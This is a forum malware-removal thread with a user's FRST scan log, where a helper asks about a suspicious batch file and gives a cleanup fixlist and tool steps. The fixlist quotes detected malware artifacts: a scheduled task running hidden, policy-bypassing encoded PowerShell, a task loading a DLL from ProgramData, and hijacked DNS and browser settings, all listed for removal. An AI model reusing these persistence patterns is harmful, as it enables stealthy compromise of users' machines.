2016-02-10 10:43 - 2016-01-22 06:07 - 02778624 _____ (Microsoft Corporation) C:\WINDOWS\system32\authui.dll
2016-02-10 10:43 - 2016-01-22 06:07 - 02120704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
2016-02-10 10:43 - 2016-01-22 06:02 - 00710144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieapfltr.dll
2016-02-10 10:43 - 2016-01-22 05:58 - 02464256 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\authui.dll
2016-02-10 10:43 - 2016-01-19 20:14 - 07453024 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2016-02-10 10:43 - 2016-01-19 20:13 - 02175008 _____ (Microsoft Corporation) C:\WINDOWS\system32\combase.dll
2016-02-10 10:43 - 2016-01-19 20:13 - 01063464 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinTypes.dll
2016-02-10 10:43 - 2016-01-19 20:12 - 01737088 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntdll.dll
2016-02-10 10:43 - 2016-01-19 20:12 - 01133744 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll
2016-02-10 10:43 - 2016-01-19 19:23 - 01564496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\combase.dll
2016-02-10 10:43 - 2016-01-19 19:23 - 01501496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntdll.dll
2016-02-10 10:43 - 2016-01-19 19:23 - 00548024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WinTypes.dll
2016-02-10 10:43 - 2016-01-19 19:15 - 00246784 _____ (Microsoft Corporation) C:\WINDOWS\system32\microsoft-windows-system-events.dll
2016-02-10 10:43 - 2016-01-19 18:30 - 00862720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll
2016-02-10 10:43 - 2016-01-19 17:37 - 00267776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wincorlib.dll
2016-02-10 10:43 - 2016-01-10 20:37 - 00136912 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuauclt.exe
2016-02-10 10:43 - 2016-01-10 17:51 - 03707392 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
2016-02-10 10:43 - 2016-01-10 17:39 - 00035840 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuapp.exe
2016-02-10 10:43 - 2016-01-10 17:38 - 00140288 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuwebv.dll
2016-02-10 10:43 - 2016-01-10 17:36 - 00409088 _____ (Microsoft Corporation) C:\WINDOWS\system32\WUSettingsProvider.dll
2016-02-10 10:43 - 2016-01-10 17:36 - 00095744 _____ (Microsoft Corporation) C:\WINDOWS\system32\wudriver.dll
2016-02-10 10:43 - 2016-01-10 17:35 - 02243584 _____ (Microsoft Corporation) C:\WINDOWS\system32\wucltux.dll
2016-02-10 10:43 - 2016-01-10 17:35 - 00897024 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuapi.dll
2016-02-10 10:43 - 2016-01-10 17:29 - 00124928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuwebv.dll
2016-02-10 10:43 - 2016-01-10 17:29 - 00029696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuapp.exe
2016-02-10 10:43 - 2016-01-10 17:27 - 00081920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wudriver.dll
2016-02-10 10:43 - 2016-01-10 17:26 - 00726528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuapi.dll
2016-02-10 10:43 - 2016-01-06 19:25 - 00140800 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxdav.sys
2016-02-10 10:43 - 2015-12-28 22:42 - 00713216 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinSync.dll
2016-02-10 10:43 - 2015-12-28 21:31 - 00578048 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WinSync.dll
2016-02-10 10:43 - 2015-12-17 19:29 - 00131584 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpudd.dll
2016-02-10 10:43 - 2015-12-17 17:17 - 03547648 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpcorets.dll
2016-02-05 15:36 - 2016-02-05 15:41 - 00000000 ____D C:\WINDOWS\SysWOW64\NV
2016-02-05 15:36 - 2016-02-05 15:41 - 00000000 ____D C:\WINDOWS\system32\NV
2016-02-05 15:36 - 2016-01-23 02:12 - 00110016 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvStreaming.exe
2016-02-05 15:34 - 2016-01-23 04:42 - 42983992 _____ C:\WINDOWS\system32\nvcompiler.dll
2016-02-05 15:34 - 2016-01-23 04:42 - 37614528 _____ C:\WINDOWS\SysWOW64\nvcompiler.dll
2016-02-05 15:34 - 2016-01-23 04:42 - 31079992 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvoglv64.dll
2016-02-05 15:34 - 2016-01-23 04:42 - 24911296 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvoglv32.dll
2016-02-05 15:34 - 2016-01-23 04:42 - 21193544 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvopencl.dll
2016-02-05 15:34 - 2016-01-23 04:42 - 20733832 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcuda.dll
2016-02-05 15:34 - 2016-01-23 04:42 - 17626352 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvopencl.dll
2016-02-05 15:34 - 2016-01-23 04:42 - 17218792 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvcuda.dll
2016-02-05 15:34 - 2016-01-23 04:42 - 16327896 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvwgf2um.dll
2016-02-05 15:34 - 2016-01-23 04:42 - 12379072 _____ (NVIDIA Corporation) C:\WINDOWS\system32\Drivers\nvlddmkm.sys
2016-02-05 15:34 - 2016-01-23 04:42 - 03145272 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcuvid.dll
2016-02-05 15:34 - 2016-01-23 04:42 - 02721216 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvcuvid.dll
2016-02-05 15:34 - 2016-01-23 04:42 - 01924152 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvdispco6436175.dll
2016-02-05 15:34 - 2016-01-23 04:42 - 01573432 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvdispgenco6436175.dll
2016-02-05 15:34 - 2016-01-23 04:42 - 00948672 _____ (NVIDIA Corporation) C:\WINDOWS\system32\NvFBC64.dll
2016-02-05 15:34 - 2016-01-23 04:42 - 00880576 _____ (NVIDIA Corporation) C:\WINDOWS\system32\NvIFR64.dll
2016-02-05 15:34 - 2016-01-23 04:42 - 00747064 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\NvFBC.dll
2016-02-05 15:34 - 2016-01-23 04:42 - 00689600 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\NvIFR.dll
2016-02-05 15:34 - 2016-01-23 04:42 - 00501896 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvEncodeAPI64.dll
2016-02-05 15:34 - 2016-01-23 04:42 - 00425016 _____ (NVIDIA Corporation) C:\WINDOWS\system32\NvIFROpenGL.dll
2016-02-05 15:34 - 2016-01-23 04:42 - 00423080 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvEncodeAPI.dll
2016-02-05 15:34 - 2016-01-23 04:42 - 00377792 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\NvIFROpenGL.dll
2016-02-05 15:34 - 2016-01-23 04:42 - 00307768 _____ (NVIDIA Corporation) C:\WINDOWS\system32\Drivers\nvkflt.sys
2016-02-05 15:34 - 2016-01-23 04:42 - 00151368 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvoglshim64.dll
2016-02-05 15:34 - 2016-01-23 04:42 - 00128512 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvoglshim32.dll
2016-02-05 15:34 - 2016-01-23 04:42 - 00038336 _____ (NVIDIA Corporation) C:\WINDOWS\system32\Drivers\nvpciflt.sys
2016-02-05 15:22 - 2015-12-18 07:11 - 00047760 _____ (NVIDIA Corporation) C:\WINDOWS\system32\Drivers\nvvad64v.sys
2016-02-05 15:22 - 2015-12-18 07:10 - 00099472 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvaudcap64v.dll
2016-02-05 15:22 - 2015-12-18 07:10 - 00090768 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvaudcap32v.dll
2016-02-05 13:45 - 2016-02-05 13:45 - 00000000 ____D C:\Users\Eirik\Documents\Rise of the Tomb Raider
2016-02-05 13:45 - 2016-02-05 13:45 - 00000000 ____D C:\Users\Eirik\AppData\Roaming\Crystal Dynamics
2016-01-31 14:03 - 2016-01-31 14:03 - 00000000 ____D C:\Users\Eirik\Documents\League of Legends
2016-01-31 01:28 - 2016-01-31 01:28 - 00341353 _____ C:\Users\Eirik\Desktop\video-1446899994.mp4.mp4
2016-01-26 23:42 - 2016-01-27 17:08 - 50847736 _____ C:\Users\Eirik\Desktop\Compass_Clues_Map.psd
 
==================== One Month Modified files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2016-02-21 16:28 - 2015-06-18 12:18 - 00000930 _____ C:\WINDOWS\Tasks\DropboxUpdateTaskUserS-1-5-21-730552332-2537374774-3045828507-1002UA.job
2016-02-21 16:20 - 2014-11-02 18:55 - 00000830 _____ C:\WINDOWS\Tasks\Adobe Flash Player Updater.job
2016-02-21 15:53 - 2013-08-29 17:54 - 00003598 _____ C:\WINDOWS\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-730552332-2537374774-3045828507-1002
2016-02-21 15:14 - 2013-11-19 23:06 - 00000000 ____D C:\Program Files (x86)\Google
2016-02-21 15:02 - 2013-08-30 10:07 - 00000000 ___RD C:\Users\Eirik\Dropbox
2016-02-21 15:02 - 2013-08-30 10:04 - 00000000 ____D C:\Users\Eirik\AppData\Roaming\Dropbox
2016-02-21 15:01 - 2015-08-05 14:44 - 00000000 ___DO C:\Users\Eirik\OneDrive
2016-02-21 15:01 - 2013-09-04 05:14 - 00000000 ____D C:\Users\Eirik\AppData\Local\CrashDumps
2016-02-21 13:32 - 2016-01-20 21:08 - 00004182 _____ C:\WINDOWS\System32\Tasks\avast! Emergency Update
2016-02-21 13:29 - 2015-12-26 01:49 - 00000258 __RSH C:\ProgramData\ntuser.pol
2016-02-21 13:29 - 2013-12-22 04:00 - 00000000 ____D C:\Users\Eirik\AppData\Local\LogMeIn Hamachi
2016-02-21 13:27 - 2014-06-20 15:13 - 00000000 ____D C:\ProgramData\NVIDIA
2016-02-21 13:27 - 2013-08-22 15:45 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2016-02-21 13:26 - 2013-08-22 14:25 - 00524288 ___SH C:\WINDOWS\system32\config\BBI
2016-02-21 13:26 - 2013-02-22 19:15 - 00000000 ____D C:\WINDOWS\hr
2016-02-21 13:08 - 2014-07-25 13:25 - 00003916 _____ C:\WINDOWS\System32\Tasks\User_Feed_Synchronization-{32D050CF-12B8-4CBE-8467-C4377C801BA0}
2016-02-21 12:42 - 2015-07-10 01:03 - 00000000 ____D C:\ProgramData\Apple
2016-02-21 12:42 - 2013-08-22 14:36 - 00000000 ____D C:\WINDOWS\Inf
2016-02-21 04:21 - 2013-09-25 17:32 - 09126400 ___SH C:\Users\Eirik\Desktop\Thumbs.db
2016-02-20 20:02 - 2015-12-26 01:48 - 00000000 ____D C:\ProgramData\afa3c0d4-3a31-1
2016-02-20 20:02 - 2015-12-26 01:48 - 00000000 ____D C:\ProgramData\afa3c0d4-36d7-0
2016-02-20 19:55 - 2015-12-30 22:05 - 00000000 ____D C:\Users\Eirik\AppData\Roaming\Skype
2016-02-20 19:45 - 2013-08-29 18:03 - 00000000 __SHD C:\WINDOWS\SysWOW64\AI_RecycleBin
2016-02-20 16:00 - 2013-09-14 00:46 - 00000024 _____ C:\Users\Eirik\random.dat
2016-02-20 15:58 - 2013-09-14 00:46 - 00000024 _____ C:\Users\Eirik\jagexappletviewer.preferences
2016-02-20 15:55 - 2013-09-14 00:46 - 00000044 _____ C:\Users\Eirik\jagex_cl_runescape_LIVE.dat
2016-02-19 20:27 - 2013-08-22 15:44 - 05103608 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2016-02-19 18:26 - 2013-12-17 09:57 - 00000000 ____D C:\Users\Eirik\Desktop\Ny mappe
2016-02-19 12:54 - 2013-08-29 17:55 - 00000000 ____D C:\Users\Eirik\Desktop\Spill
2016-02-18 14:04 - 2013-08-22 16:36 - 00000000 ____D C:\Program Files\Common Files\microsoft shared
2016-02-18 11:42 - 2013-08-22 16:36 - 00000000 ____D C:\WINDOWS\AppReadiness
2016-02-17 18:37 - 2014-11-14 22:52 - 00000000 ____D C:\Users\Eirik\AppData\Local\Spotify
2016-02-17 18:09 - 2014-11-14 22:52 - 00000000 ____D C:\Users\Eirik\AppData\Roaming\Spotify
2016-02-17 13:12 - 2013-08-22 16:36 - 00000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2016-02-16 23:25 - 2015-11-13 18:03 - 00002457 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
2016-02-16 13:24 - 2014-04-10 11:31 - 00000713 _____ C:\Users\Eirik\Desktop\Ranked stuff.txt
2016-02-14 04:28 - 2015-06-18 12:18 - 00000878 _____ C:\WINDOWS\Tasks\DropboxUpdateTaskUserS-1-5-21-730552332-2537374774-3045828507-1002Core.job
2016-02-13 21:46 - 2013-08-22 16:36 - 00000000 ____D C:\WINDOWS\rescache
2016-02-13 03:06 - 2014-03-18 10:36 - 00000000 ____D C:\Program Files\Windows Journal
2016-02-13 03:05 - 2014-12-12 01:15 - 00000000 ____D C:\WINDOWS\system32\appraiser
2016-02-13 03:05 - 2013-08-22 16:36 - 00000000 ___RD C:\WINDOWS\ToastData
2016-02-13 01:50 - 2015-08-18 23:07 - 00000000 ____D C:\Users\Eirik\.oracle_jre_usage
2016-02-13 01:49 - 2013-08-29 22:43 - 00000000 ____D C:\Program Files (x86)\Java
2016-02-13 01:47 - 2013-12-05 19:11 - 00000000 ____D C:\Users\Eirik\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinRAR
2016-02-13 01:47 - 2013-12-05 19:11 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinRAR
2016-02-13 01:47 - 2013-12-05 19:11 - 00000000 ____D C:\Program Files\WinRAR
2016-02-13 01:46 - 2013-10-13 21:15 - 00000000 ____D C:\ProgramData\Oracle
2016-02-13 01:32 - 2013-10-06 01:40 - 00000000 ____D C:\Users\Eirik\AppData\Roaming\vlc
2016-02-12 03:38 - 2012-07-26 08:59 - 00000000 ____D C:\WINDOWS\CbsTemp
2016-02-12 02:59 - 2013-08-30 16:41 - 00000000 ____D C:\WINDOWS\system32\MRT
2016-02-12 02:54 - 2013-08-30 16:41 - 146614896 _____ (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2016-02-10 22:20 - 2014-11-02 18:55 - 00003718 _____ C:\WINDOWS\System32\Tasks\Adobe Flash Player Updater
2016-02-10 10:21 - 2013-08-22 16:36 - 00000000 ___HD C:\Program Files\WindowsApps
2016-02-10 02:32 - 2013-08-30 14:06 - 00000000 ____D C:\ProgramData\Skype
2016-02-08 19:59 - 2014-03-18 10:51 - 01381246 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2016-02-08 19:59 - 2014-03-18 10:23 - 00450948 _____ C:\WINDOWS\system32\perfh014.dat
2016-02-08 19:59 - 2014-03-18 10:23 - 00077588 _____ C:\WINDOWS\system32\perfc014.dat
2016-02-05 15:37 - 2014-06-20 15:12 - 00000000 ____D C:\ProgramData\NVIDIA Corporation
2016-02-05 15:37 - 2014-06-20 15:12 - 00000000 ____D C:\Program Files (x86)\NVIDIA Corporation
2016-02-05 15:35 - 2014-06-20 15:12 - 00000000 ____D C:\Program Files\NVIDIA Corporation
2016-02-05 15:27 - 2013-12-12 02:23 - 00000000 ____D C:\Users\Eirik\AppData\Local\NVIDIA
2016-02-02 03:37 - 2013-08-22 16:38 - 00828920 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe
2016-02-02 03:37 - 2013-08-22 16:38 - 00176632 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl
2016-01-31 13:43 - 2013-08-22 16:36 - 00000000 ____D C:\WINDOWS\system32\NDF
2016-01-23 04:42 - 2016-01-01 01:23 - 18758400 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvwgf2umx.dll
2016-01-23 04:42 - 2015-08-18 23:15 - 03258664 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvapi.dll
2016-01-23 04:42 - 2014-03-10 08:02 - 16995064 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvd3dumx.dll
2016-01-23 04:42 - 2014-03-10 08:02 - 14016576 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvd3dum.dll
2016-01-23 04:42 - 2014-03-10 08:02 - 03683560 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvapi64.dll
2016-01-23 04:42 - 2014-03-10 08:02 - 00468960 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvumdshimx.dll
2016-01-23 04:42 - 2014-03-10 08:02 - 00388560 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvumdshim.dll
2016-01-23 04:42 - 2014-03-10 08:02 - 00175368 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvinitx.dll
2016-01-23 04:42 - 2014-03-10 08:02 - 00153392 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvinit.dll
2016-01-23 04:42 - 2014-03-10 08:02 - 00034905 _____ C:\WINDOWS\system32\nvinfo.pb
2016-01-23 02:27 - 2014-06-20 15:26 - 00000000 ____D C:\Users\Eirik
2016-01-23 02:04 - 2014-06-20 15:13 - 06368312 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcpl.dll
2016-01-23 02:04 - 2014-06-20 15:13 - 02992064 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvsvc64.dll
2016-01-23 02:04 - 2014-06-20 15:13 - 02563128 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvsvcr.dll
2016-01-23 02:04 - 2014-06-20 15:13 - 01263040 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvvsvc.exe
2016-01-23 02:04 - 2014-06-20 15:13 - 00532024 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nv3dappshext.dll
2016-01-23 02:04 - 2014-06-20 15:13 - 00393784 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvmctray.dll
2016-01-23 02:04 - 2014-06-20 15:13 - 00083512 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nv3dappshextr.dll
2016-01-23 02:04 - 2014-06-20 15:13 - 00071224 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvshext.dll
2016-01-22 22:07 - 2014-06-20 15:13 - 06125650 _____ C:\WINDOWS\system32\nvcoproc.bin
2016-01-22 11:38 - 2016-01-20 21:07 - 00000000 ____D C:\Program Files\AVAST Software
 
==================== Files in the root of some directories =======
 
2013-09-30 11:50 - 2013-09-30 13:33 - 0000132 _____ () C:\Users\Eirik\AppData\Roaming\Adobe BMP Format CS6 Prefs
2013-10-01 23:21 - 2015-11-29 14:29 - 0000132 _____ () C:\Users\Eirik\AppData\Roaming\Adobe PNG Format CS6 Prefs
2015-12-26 02:02 - 2015-12-26 02:02 - 0000046 _____ () C:\Users\Eirik\AppData\Roaming\Camdata.ini
2015-12-26 02:02 - 2015-12-26 02:02 - 0000408 _____ () C:\Users\Eirik\AppData\Roaming\CamLayout.ini
2015-12-26 02:02 - 2015-12-26 02:02 - 0000408 _____ () C:\Users\Eirik\AppData\Roaming\CamShapes.ini
2015-12-26 02:02 - 2015-12-26 02:02 - 0004536 _____ () C:\Users\Eirik\AppData\Roaming\CamStudio.cfg
2015-12-26 01:52 - 2015-12-26 01:52 - 0000096 _____ () C:\Users\Eirik\AppData\Roaming\version2.xml
2014-05-18 17:30 - 2014-05-18 21:19 - 0000173 _____ () C:\Users\Eirik\AppData\Local\msmathematics.qat.Eirik
2013-10-31 21:32 - 2013-10-31 21:46 - 0000600 _____ () C:\Users\Eirik\AppData\Local\PUTTY.RND
 
Some files in TEMP:
====================
C:\Users\Eirik\AppData\Local\Temp\32931009.t.exe
C:\Users\Eirik\AppData\Local\Temp\sqlite3.dll
 
 
==================== Bamital & volsnap =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\wininit.exe => File is digitally signed
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2016-02-21 13:54
 
==================== End of FRST.txt ============================

 

As the post was apparently too long, I've added "Addition.txt" as an attached file. If thats not what you want, I'll just paste it in another reply.

I hope I got this right. As I was doing this, I found I have uTorrent on my computer. I don't think it was activated while doing this, but I can't tell for sure. 

Addition.txt

Link to post
Share on other sites

Hello Eirik
 

It did delete like 29 objects earlier, I dunno if that will show up on the new scan logs? If you do want some of the old, tell me.

No, that's fine. Thank you. 
 

As the post was apparently too long, I've added "Addition.txt" as an attached file.

No problem at all. :)
 

As I was doing this, I found I have uTorrent on my computer. I don't think it was activated while doing this, but I can't tell for sure. 

There is no issue here as long as the programme is not used during this process. 
 
Before we begin, please answer the following questions:

  • Do you recognise this programme? høstprosekt_v5 
  • Do you recognise this file (please refrain from executing)? C:\Users\Eirik\Downloads\replay_1346256955.bat
Link to post
Share on other sites

 

 

  • Do you recognise this programme? høstprosekt_v5 

Ye, I believe so. Its a project from school a few years ago. 

 

 

 

  • Do you recognise this file (please refrain from executing)? C:\Users\Eirik\Downloads\replay_1346256955.bat

Not sure about this. I believe its a replay from League of Legends, but I can't tell for sure. Should I delete it?

Link to post
Share on other sites

Hi Eirik, 
 

Not sure about this. I believe its a replay from League of Legends, but I can't tell for sure. Should I delete it?

The file in question is a Windows Batch file, designed to execute commands via the Command Prompt. Did a user/player in-game send you this file to open? When communicating with players online, never download or open files sent to you as this could be a method of malware distribution. Before deleting the file, I would like to double-check the contents. 
 
Please carry out the instructions below. Let me know if the Malwarebytes Anti-Malware (MBAM) outbound blocks still persist or not.
 
STEP 1
xlK5Hdb.png Farbar Recovery Scan Tool (FRST) Script

  • Press the Windows Key pdKOQKY.png + r on your keyboard at the same time. Type Notepad and click OK.
  • Copy the entire contents of the codebox below and paste into the Notepad document.
    startCreateRestorePoint:ShellIconOverlayIdentifiers: [ SkyDrive1] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} =>  No FileShellIconOverlayIdentifiers: [ SkyDrive2] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} =>  No FileShellIconOverlayIdentifiers: [ SkyDrive3] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} =>  No FileShellIconOverlayIdentifiers-x32: [ SkyDrive1] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} =>  No FileShellIconOverlayIdentifiers-x32: [ SkyDrive2] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} =>  No FileShellIconOverlayIdentifiers-x32: [ SkyDrive3] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} =>  No FileToolbar: HKLM - No Name - {318A227B-5E9F-45bd-8999-7F8F10CA4CF5} -  No FileFF Plugin-x32: @pandonetworks.com/PandoWebPlugin -> C:\Program Files (x86)\Pando Networks\Media Booster\npPandoWebPlugin.dll [No File]C:\Program Files (x86)\Pando NetworksCHR HomePage: Default -> hxxps://no.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_camstd_15_52&param1=1&param2=f%3D1%26b%3DChrome%26cc%3Dno%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzuzz0Czzzy0AyDtD0DtCyD0AyEyE0B0F0BtN0D0Tzu0StCyEyDyEtN1L2XzutAtFtCyCtFtCtFtDtN1L1Czu1ByEtN1L1G1B1V1N2Y1L1Qzu2SyE0B0E0CtB0BtB0BtGtD0EyDzytG0EyCyBzytGyByC0AtAtG0Bzz0CyByEyC0B0D0F0D0E0A2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0D0Azy0FtCyByE0BtGtC0E0FtCtGyEyC0BtAtG0A0EtBtCtGzz0D0AyE0AyCtCtA0Fzy0EyE2QtN0A0LzuyE%26cr%3D1100335688%26a%3Dwncy_camstd_15_52%26os_ver%3D6.3%26os%3DWindows%2B8.1CHR StartupUrls: Default -> "hxxps://no.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_camstd_15_52&param1=1&param2=f%3D7%26b%3DChrome%26cc%3Dno%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzuzz0Czzzy0AyDtD0DtCyD0AyEyE0B0F0BtN0D0Tzu0StCyEyDyEtN1L2XzutAtFtCyCtFtCtFtDtN1L1Czu1ByEtN1L1G1B1V1N2Y1L1Qzu2SyE0B0E0CtB0BtB0BtGtD0EyDzytG0EyCyBzytGyByC0AtAtG0Bzz0CyByEyC0B0D0F0D0E0A2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0D0Azy0FtCyByE0BtGtC0E0FtCtGyEyC0BtAtG0A0EtBtCtGzz0D0AyE0AyCtCtA0Fzy0EyE2QtN0A0LzuyE%26cr%3D1100335688%26a%3Dwncy_camstd_15_52%26os_ver%3D6.3%26os%3DWindows%2B8.1"C:\ProgramData\e8446722-6f23-0C:\ProgramData\e8446722-2d61-1C:\ProgramData\e8446722-6925-0C:\ProgramData\e8446722-69a5-0C:\ProgramData\d25388542016-02-20 20:01 - 2016-02-20 20:01 - 00003728 _____ C:\WINDOWS\System32\Tasks\{C6E33A63-3216-AF1A-2367-44E89883B011}C:\ProgramData\afa3c0d4-3a31-1C:\ProgramData\afa3c0d4-36d7-0C:\Users\Eirik\AppData\Local\Temp\32931009.t.exeTask: {86E25734-C69A-4DFA-90D3-8E33960A544D} - System32\Tasks\{C6E33A63-3216-AF1A-2367-44E89883B011} => /s /n /i:"/rt" "C:\PROGRA~3\d2538854\d0129810.dll"Task: {E0A724F9-2E64-483E-B1B1-9A0C7C41376A} - System32\Tasks\{09090D47-7809-0D78-0911-09090F0E117A} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcA (the data entry has 9412 more characters).Tcpip\..\Interfaces\{37BFE48D-77CD-419D-8D47-2C194E38046A}: [DhcpNameServer] 82.163.143.171Tcpip\..\Interfaces\{C9B14333-EC8D-4272-ADBE-4ED48828BBD5}: [DhcpNameServer] 82.163.143.171Tcpip\..\Interfaces\{E9A4C058-84BB-4E14-81B1-3108B7D371F9}: [DhcpNameServer] 82.163.143.171CMD: type C:\Users\Eirik\Downloads\replay_1346256955.batCMD: ipconfig /flushdnsEmptyTemp:end
  • Click FileSave As and type fixlist.txt as the File Name
  • Important: The file must be saved in the same location as FRST64.exe. 

NOTICE: This script is intended for use on this particular machine. Do not use this script on any other machine; doing so may cause damage to your Operating System.

  • Right-Click FRST64.exe and select AVOiBNU.jpg Run as administrator to run the programme.
  • Click Fix.
  • A log (Fixlog.txt) will open on your desktop. Copy the contents of the log and paste in your next reply.
     

STEP 2
E3feWj5.png Junkware Removal Tool (JRT)

  • Please download Junkware Removal Tool and save the file to your Desktop.
  • Temporarily disable your anti-virus software. For instructions, please refer to the following link.
  • Right-Click JRT.exe and select AVOiBNU.jpg Run as administrator to run the programme.
  • Follow the prompts and allow the scan to run uninterrupted. 
  • Upon completion, a log (JRT.txt) will open on your desktop.
  • Re-enable your anti-virus software.
  • Copy the contents of JRT.txt and paste in your next reply.
     

STEP 3
BY4dvz9.png AdwCleaner

  • Please download AdwCleaner and save the file to your Desktop.
  • Right-Click AdwCleaner.exe and select AVOiBNU.jpg Run as administrator to run the programme.
  • Follow the prompts. 
  • Click Scan
  • Upon completion, click Logfile. A log (AdwCleaner[s1].txt) will open. Briefly check the log for anything you know to be legitimate. 
  • Ensure anything you know to be legitimate does not have a checkmark under the corresponding tab, and click Cleaning
  • Follow the prompts and allow your computer to reboot
  • After the reboot, a log (AdwCleaner[C1].txt) will open. Copy the contents of the log and paste in your next reply.

